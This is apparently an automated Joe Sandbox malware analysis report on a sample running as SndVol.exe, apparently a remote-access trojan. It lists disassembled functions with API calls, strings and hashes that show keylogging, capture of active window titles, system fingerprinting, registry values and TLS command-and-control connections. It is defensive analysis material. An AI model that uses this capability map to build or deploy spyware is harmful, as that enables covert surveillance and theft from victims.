Connecting | , xrefs: 00413B5E
| , xrefs: 00413B68, 00413CA9
Connected | , xrefs: 00413CA4
hlight, xrefs: 00413DE9
Disconnected, xrefs: 00414437
TLS On , xrefs: 00413B49
Connection Error: , xrefs: 00413BF5
3.8.0 Pro, xrefs: 00413F03
TLS Off, xrefs: 00413B3B
Connection Error: Unable to create socket, xrefs: 00413C40

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Sleep$ErrorLastLocalTime
String ID: | $%I64u$3.8.0 Pro$C:\Windows\SysWOW64\SndVol.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$H"G$TLS Off$TLS On $`"G$hlight$name$!G
API String ID: 524882891-3617896314
Opcode ID: 04458a4c39c0faa6fda59e91e24422400087db4d2b388f268530565d1c5e53b9
Instruction ID: 5f58eceae2704c6c0e376aa481a0c6a7ef3cc820e2c63ea8d389b44db61c6c97
Opcode Fuzzy Hash: 04458a4c39c0faa6fda59e91e24422400087db4d2b388f268530565d1c5e53b9
Instruction Fuzzy Hash: 9F42AE31A001055BCB18F765DDA6AEEB3699F90308F1041BFF40A721E2EF785F868A5D

Function 004048A8 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32(?,?,?), ref: 004048C0
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049E0
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049EE
WSAGetLastError.WS2_32 ref: 00404A01

Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4

Strings

TLS Handshake... | , xrefs: 004048E4
TLS Authentication Failed, xrefs: 00404979
TLS Error 2, xrefs: 00404935
TLS Error 1, xrefs: 00404917
Connection Failed: , xrefs: 00404A23
Connection Refused, xrefs: 00404A56
TLS Error 3, xrefs: 004049B8

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CreateEvent$ErrorLastLocalTimeconnect
String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
API String ID: 994465650-2151626615
Opcode ID: c47823f5d81b8fcd8c44ffe76240809f8c8049aa42c9dfd8a5859606e97f7b5b
Instruction ID: f1749a2af40dec866484330b2464a30bcc7489b9f615ba144f2b3c776ade1d80
Opcode Fuzzy Hash: c47823f5d81b8fcd8c44ffe76240809f8c8049aa42c9dfd8a5859606e97f7b5b
Instruction Fuzzy Hash: 37412AB5B406017BD608777A8E1B96E7625AB81304B50017FF901136D2EBBD9C2197DF

Function 00404E06 Relevance: 18.1, APIs: 12, Instructions: 65
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E18
SetEvent.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E23
CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E2C
closesocket.WS2_32(000000FF), ref: 00404E3A
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E71
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404E82
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E89
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404E9A
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404E9F
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EA4
SetEvent.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404EB1
CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404EB6

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$ObjectSingleWait$closesocket
String ID:
API String ID: 3658366068-0
Opcode ID: f707382b18fa39c0527187131c55234197c0fa46854763e90b09e39a9568e99a
Instruction ID: b890c501aeabc943cf782ca315c2c368517b908ebe77e8074f52597b82095e9a
Opcode Fuzzy Hash: f707382b18fa39c0527187131c55234197c0fa46854763e90b09e39a9568e99a
Instruction Fuzzy Hash: 1B212C71000B009FDB216B26DC49B17BBE5FF40326F114A2DE2E212AF1CB79E851DB58

Function 00409C1F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__Init_thread_footer.LIBCMT ref: 00409C81
Sleep.KERNEL32(000001F4), ref: 00409C8C
GetForegroundWindow.USER32 ref: 00409C92
GetWindowTextLengthW.USER32(00000000), ref: 00409C9B
GetWindowTextW.USER32(00000000,00000000,00000000), ref: 00409CCF
Sleep.KERNEL32(000003E8), ref: 00409D9D

Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,?,0040A77B,?,?,?,?,?,00000000), ref: 0040965A

Strings

[, xrefs: 00409D37
], xrefs: 00409D31
{ User has been idle for , xrefs: 00409DCF
minutes }, xrefs: 00409DC3

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Window$SleepText$EventForegroundInit_thread_footerLength
String ID: [${ User has been idle for $ minutes }$]
API String ID: 911427763-3954389425
Opcode ID: ee9b949ba4685117d773663a634f46785a27bf3fcb47f19481d588488b50e058
Instruction ID: 7a62ae1493acfbf190be1d0992f15f5c774c3bdccfea44e4f2dca48363f02a21
Opcode Fuzzy Hash: ee9b949ba4685117d773663a634f46785a27bf3fcb47f19481d588488b50e058
Instruction Fuzzy Hash: 7C5193716043405BD304FB61D855A6EB795AF84308F50093FF486A62E3DF7CAE45C69A

Function 0040C5ED Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040C753

Strings

Temp, xrefs: 0040C61F
WinDir, xrefs: 0040C654, 0040C676, 0040C6C8
\system32, xrefs: 0040C667
ProgramData, xrefs: 0040C718
\SysWOW64, xrefs: 0040C6B9
SystemDrive, xrefs: 0040C64A
AppData, xrefs: 0040C70A
ProgramFiles, xrefs: 0040C727
UserProfile, xrefs: 0040C711

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: LongNamePath
String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
API String ID: 82841172-425784914
Opcode ID: d3518c8d59edcaf627053583512712ef66c69770ad1c8e6e2541324bc6181318
Instruction ID: e0747f7f0ded3e76473395fd4b63a7f1dfd4675be44f898a7a0c8db3d1efc66a
Opcode Fuzzy Hash: d3518c8d59edcaf627053583512712ef66c69770ad1c8e6e2541324bc6181318
Instruction Fuzzy Hash: EB4168315042419AC204FB62DC929EFB7E8AEA4759F10063FF541720E2EF799E49C99F

Function 0040971E Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 163
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00001388), ref: 00409738

Part of subcall function 0040966D: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409745), ref: 004096A3
Part of subcall function 0040966D: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409745), ref: 004096B2
Part of subcall function 0040966D: Sleep.KERNEL32(00002710,?,?,?,00409745), ref: 004096DF
Part of subcall function 0040966D: CloseHandle.KERNEL32(00000000,?,?,?,00409745), ref: 004096E6

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409774
GetFileAttributesW.KERNEL32(00000000), ref: 00409785
SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040979C
PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409816

Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040983B), ref: 0041A228

SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00469654,?,00000000,00000000,00000000,00000000,00000000), ref: 0040991F

Strings

H"G, xrefs: 004097EF
05ou`ou, xrefs: 0040979C, 0040991F
H"G, xrefs: 004097FA

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
String ID: 05ou`ou$H"G$H"G
API String ID: 3795512280-2072512923
Opcode ID: b8336bd786565f66fdc5ece92215671476f6ca181f44d705e0a27e626737db20
Instruction ID: 85d6828eff9e87111454ffe40de9a07a949f8ec8799fb43d86416e8e02d17308
Opcode Fuzzy Hash: b8336bd786565f66fdc5ece92215671476f6ca181f44d705e0a27e626737db20
Instruction Fuzzy Hash: 9D513D712043015BCB14BB72C9A6ABF76999F90308F00453FB946B72E3DF7D9D09869A

Function 004192AE Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34

Part of subcall function 00411F91: RegOpenKeyExA.KERNEL32(80000002,00000400,00000000,00020019,?), ref: 00411FB5
Part of subcall function 00411F91: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00411FD2
Part of subcall function 00411F91: RegCloseKey.KERNEL32(?), ref: 00411FDD

StrToIntA.SHLWAPI(00000000,00469710,00000000,00000000,00000000,00471FFC,00000001,?,?,?,?,?,?,0040D6A0), ref: 00419327

Strings

ProductName, xrefs: 004192BD
CurrentBuildNumber, xrefs: 00419308
(64 bit), xrefs: 00419353
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 004192C2, 004192CC, 0041930D
(32 bit), xrefs: 0041935A

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CloseCurrentOpenProcessQueryValue
String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 1866151309-2070987746
Opcode ID: 0802035b950ed000d9a10129efeec30dbf5645d1e0bd6e921da0c017b2021ac7
Instruction ID: a9b62d1d1389f8d2b696bc63f2982e792167bed2dd8bed00043a633dd184e9c5
Opcode Fuzzy Hash: 0802035b950ed000d9a10129efeec30dbf5645d1e0bd6e921da0c017b2021ac7
Instruction Fuzzy Hash: E411E371A002456AC704B765CC67AAF761D8B54309F64053FF905A71E2FABC4D8282AA

Function 0040966D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58
sleepfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409745), ref: 004096A3
GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409745), ref: 004096B2
Sleep.KERNEL32(00002710,?,?,?,00409745), ref: 004096DF
CloseHandle.KERNEL32(00000000,?,?,?,00409745), ref: 004096E6

Strings

h G, xrefs: 00409698

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSizeSleep
String ID: h G
API String ID: 1958988193-3300504347
Opcode ID: 13e975a3868741cffac1d73112577800afb55aac81ce9bb8c63aa5aacad1b37c
Instruction ID: 1483d32ec36d41576822df3093d1b75ffc22edec2a146082987510034e162158
Opcode Fuzzy Hash: 13e975a3868741cffac1d73112577800afb55aac81ce9bb8c63aa5aacad1b37c
Instruction Fuzzy Hash: 24113D70201380ABD7316B749D99A2F3A9BB746304F44087EF281636D3C67D5C44C32E

Function 0041A17B Relevance: 7.6, APIs: 5, Instructions: 67
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041A29A,00000000,00000000,?), ref: 0041A1BA
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,004098DF,?,00000000,00000000), ref: 0041A1D7
CloseHandle.KERNEL32(00000000,?,004098DF,?,00000000,00000000), ref: 0041A1E3
WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,004098DF,?,00000000,00000000), ref: 0041A1F4
CloseHandle.KERNEL32(00000000,?,004098DF,?,00000000,00000000), ref: 0041A201

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreatePointerWrite
String ID:
API String ID: 1852769593-0
Opcode ID: 900e91da6aef5ae1ef2d64e2906a14ebfc53969b27a9c650ee74425d8e4f4bd5
Instruction ID: 9d85e8900f1be3931a26f88ae5ac80d5e45035a8363d546858a313564ae31bc3
Opcode Fuzzy Hash: 900e91da6aef5ae1ef2d64e2906a14ebfc53969b27a9c650ee74425d8e4f4bd5
Instruction Fuzzy Hash: 0911C4712062147FE6105A249C88EFB779CEB46375F10076AF556C32D1C6698C95863B

Function 00409203 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32(00000000,00000000,00409305,?,00000000,00000000), ref: 0040928B
CreateThread.KERNEL32(00000000,00000000,004092EF,?,00000000,00000000), ref: 0040929B
CreateThread.KERNEL32(00000000,00000000,Function_00009311,?,00000000,00000000), ref: 004092A7

Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A0BE
Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F

Strings

Offline Keylogger Started, xrefs: 00409228, 0040922F, 0040925C

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CreateThread$LocalTimewsprintf
String ID: Offline Keylogger Started
API String ID: 465354869-4114347211
Opcode ID: 4f413bfeddc20b053a911010c7dd0c78c6d83759768fb02ef20824c4023f4b57
Instruction ID: c8e77f7b3f84bd49b91c3d3ae4e8ac846fef78eef7351f53fb2416b9cb49ddb0
Opcode Fuzzy Hash: 4f413bfeddc20b053a911010c7dd0c78c6d83759768fb02ef20824c4023f4b57
Instruction Fuzzy Hash: 3211A7A15003083ED210BB669DD6CBB7A5CDA8139CB40057FF845221C3EAB85D19C6FF

Function 00404F31 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
timethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLocalTime.KERNEL32(?), ref: 00404F61
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FAD
CreateThread.KERNEL32(00000000,00000000,Function_00005130,?,00000000,00000000), ref: 00404FC0

Strings

Connection KeepAlive | Enabled | Timeout: , xrefs: 00404F74

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Create$EventLocalThreadTime
String ID: Connection KeepAlive | Enabled | Timeout:
API String ID: 2532271599-507513762
Opcode ID: 5d766c76dcec6d73f72b384432e0c1d874659834d306d7d3d0de572776f31551
Instruction ID: 3880ceca910d84d0b9b3d3001f949c19a9d90d4f91ad2e0c59d2668d569340f7
Opcode Fuzzy Hash: 5d766c76dcec6d73f72b384432e0c1d874659834d306d7d3d0de572776f31551
Instruction Fuzzy Hash: 4F1127719002806AC720BB769C0DE9B7FA89BD2714F44056FF44123281D6B89445CBBA

Function 0041215F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041216E
RegSetValueExA.KERNEL32(?,00464150,00000000,?,00000000,00000000,00472200,?,pth_unenc,0040E23B,00464150,3.8.0 Pro), ref: 00412196
RegCloseKey.KERNEL32(?,?,pth_unenc,0040E23B,00464150,3.8.0 Pro), ref: 004121A1

Strings

pth_unenc, xrefs: 0041215F

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: pth_unenc
API String ID: 1818849710-4028850238
Opcode ID: bb05d805405002c9ea24476e63677667bc427e1baa708286b474a2e763bb1422
Instruction ID: 4e2890e51e7d784523b6c6e9c9a916a8daaabc2f4381c7e0ff06ecafce147d70
Opcode Fuzzy Hash: bb05d805405002c9ea24476e63677667bc427e1baa708286b474a2e763bb1422
Instruction Fuzzy Hash: 5AF0F632100208BFCB00EFA0DD45DEE373CEF04751F104226BD09A61A2D7359E10DB94

Function 00411F34 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00411F54
RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,00472200), ref: 00411F72
RegCloseKey.KERNEL32(?), ref: 00411F7D

Strings

pth_unenc, xrefs: 00411F34

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: pth_unenc
API String ID: 3677997916-4028850238
Opcode ID: 57758b6d0601c7ca4cdc37a1c8378ac71baf4d5830b0c502524eb489cf77768e
Instruction ID: 6ec0a72befc52f1c009cc632a5b728b25634ffaa8485c37bac66e7b8b5c78dc5
Opcode Fuzzy Hash: 57758b6d0601c7ca4cdc37a1c8378ac71baf4d5830b0c502524eb489cf77768e
Instruction Fuzzy Hash: 31F01D7694020CBFDF109FA09C45FEE7BBCEB04B11F1041A5BA04E6191D2359A54DB94

Function 00411F91 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000002,00000400,00000000,00020019,?), ref: 00411FB5
RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00411FD2
RegCloseKey.KERNEL32(?), ref: 00411FDD

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: bd819641beb65f800504f4ea07b1b85b9b2ddc2993f1f77fdff934dbeb1127c7
Instruction ID: 7c5a36a74d232ee299d7294234303f181ef10811f7d8c913f13e4634b011a18e
Opcode Fuzzy Hash: bd819641beb65f800504f4ea07b1b85b9b2ddc2993f1f77fdff934dbeb1127c7
Instruction Fuzzy Hash: 2D01D676900218BBCB209B95DD08DEF7F7DDB84751F000166BB05A3150DB748E46D7B8

Function 00443649 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B

Strings

P@, xrefs: 0044364B

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: P@
API String ID: 1279760036-676759640
Opcode ID: 0c61ffa0ec78c269e0422769366e0108c3b164e239eff4ad14a217a7d57edf52
Instruction ID: 99ef05a6bb91785527f59a1062444bc3c705daae6acf277761014d7f2c467fed
Opcode Fuzzy Hash: 0c61ffa0ec78c269e0422769366e0108c3b164e239eff4ad14a217a7d57edf52
Instruction Fuzzy Hash: 7EE0E52110162377F6312E635C0075B36489F41BA2F17412BFC8596780CB69CE0041AD

Function 0040480D Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(?,00000001,00000006), ref: 00404832
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,004052EB,?,?,00000000,00000000,?,?,00000000,004051E8,?,00000000), ref: 0040486E

Part of subcall function 0040487E: WSAStartup.WS2_32(00000202,00000000), ref: 00404893

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CreateEventStartupsocket
String ID:
API String ID: 1953588214-0
Opcode ID: d0890d6b9dbf7aa10081a8f0c48d4e4836abc09c18ec6d90db35a2a0ad95277d
Instruction ID: 6a7ca6a32121b389846a28cffc2ecd87dee0ffbb862a0929ff73aad7f5bc5f79
Opcode Fuzzy Hash: d0890d6b9dbf7aa10081a8f0c48d4e4836abc09c18ec6d90db35a2a0ad95277d
Instruction Fuzzy Hash: 3301B1B14087809FD7349F28B8446877FE0AB15300F048D6EF1CA93BA1D3B1A444CB18

Function 0040163E Relevance: 3.0, APIs: 2, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f210c679e2b780eded3ea4ef50917041f60fa4d2abe52b8749c2b449606446f0
Instruction ID: 17b6f17919427e724365abd55f1db4a6b8769e1fa76fb76fe63095c9ff18be87
Opcode Fuzzy Hash: f210c679e2b780eded3ea4ef50917041f60fa4d2abe52b8749c2b449606446f0
Instruction Fuzzy Hash: 09F0ECB02042015BCB1C9B34CD5062B379A4BA8365F289F7FF02BD61E0C73AC895860D

Function 0041393F Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(00000000,00000000,00000000,0046FACC,00471FFC,00000000,00413BDE,00000000,00000001), ref: 00413961
WSASetLastError.WS2_32(00000000), ref: 00413966

Part of subcall function 004137DC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0041382B
Part of subcall function 004137DC: LoadLibraryA.KERNEL32(?), ref: 0041386D
Part of subcall function 004137DC: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0041388D
Part of subcall function 004137DC: FreeLibrary.KERNEL32(00000000), ref: 00413894
Part of subcall function 004137DC: LoadLibraryA.KERNEL32(?), ref: 004138CC
Part of subcall function 004137DC: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 004138DE
Part of subcall function 004137DC: FreeLibrary.KERNEL32(00000000), ref: 004138E5
Part of subcall function 004137DC: GetProcAddress.KERNEL32(00000000,?), ref: 004138F4

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
String ID:
API String ID: 1170566393-0
Opcode ID: 446cd1a75fef60d2dbb194a89db87c245147481f39af62d49fc0052fbde1f552
Instruction ID: 06324504dbe977c901379e35fefec32dabdef79d564ed510376fbe661015aea4
Opcode Fuzzy Hash: 446cd1a75fef60d2dbb194a89db87c245147481f39af62d49fc0052fbde1f552
Instruction Fuzzy Hash: FFD02B723001213B9310AB5DAC01FB76B9CDFD27227050037F409C3110D7948D4147AD

Function 00408F1F Relevance: 1.6, APIs: 1, Instructions: 80COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00408F39

Part of subcall function 00409203: CreateThread.KERNEL32(00000000,00000000,00409305,?,00000000,00000000), ref: 0040928B
Part of subcall function 00409203: CreateThread.KERNEL32(00000000,00000000,004092EF,?,00000000,00000000), ref: 0040929B
Part of subcall function 00409203: CreateThread.KERNEL32(00000000,00000000,Function_00009311,?,00000000,00000000), ref: 004092A7

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CreateThread$_wcslen
String ID:
API String ID: 1119755333-0
Opcode ID: a4cf6233b645aec8069e012e89874406b6158c7e2554cf9ff51d1662effb5250
Instruction ID: bde1965b6f08766bd400bb9d626b3f4fd5e121562736213e95ba31f4244dc5e2
Opcode Fuzzy Hash: a4cf6233b645aec8069e012e89874406b6158c7e2554cf9ff51d1662effb5250
Instruction Fuzzy Hash: 86218F719040899ACB09FFB5DD528EE7BB5AE51308F00003FF941722E2DE785A49DA99

Function 0040487E Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,00000000), ref: 00404893

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: a39f64238678d40d2918f9ecd5b136492fe542bf64fe6c2875bf53ab9f510d38
Instruction ID: a9c8eddc0db4f5dff40e6a71866b0cfb015b1534c728beba927ba249e589f683
Opcode Fuzzy Hash: a39f64238678d40d2918f9ecd5b136492fe542bf64fe6c2875bf53ab9f510d38
Instruction Fuzzy Hash: C2D0123255860C4ED610ABB4AD0F8A5775CC313A16F4003BAACB9835D3F640571CC2AB

Function 00424A7D Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON

Download Yara Rule

APIs

send.WS2_32(?,?,?,?), ref: 00424A87

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: 01e24c4520a6d3c4395155137d096ef59c3bb50acc7407598b25046a660799bf
Instruction ID: 7b6f63586de962cf13c642be8f044126cb3c52731424b67aaf056de8313b57d0
Opcode Fuzzy Hash: 01e24c4520a6d3c4395155137d096ef59c3bb50acc7407598b25046a660799bf
Instruction Fuzzy Hash: 41B092B9108302BFCA160B60CC0887A7EA6ABC8786B00882CF546421B0C636C460AB2A

Non-executed Functions

Function 00410B5C Relevance: 33.5, APIs: 7, Strings: 12, Instructions: 238threadCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00410B6B

Part of subcall function 00412268: RegCreateKeyA.ADVAPI32(80000001,00000000,P0F), ref: 00412276
Part of subcall function 00412268: RegSetValueExA.ADVAPI32(P0F,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 00412291
Part of subcall function 00412268: RegCloseKey.ADVAPI32(?,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 0041229C

OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410BAB
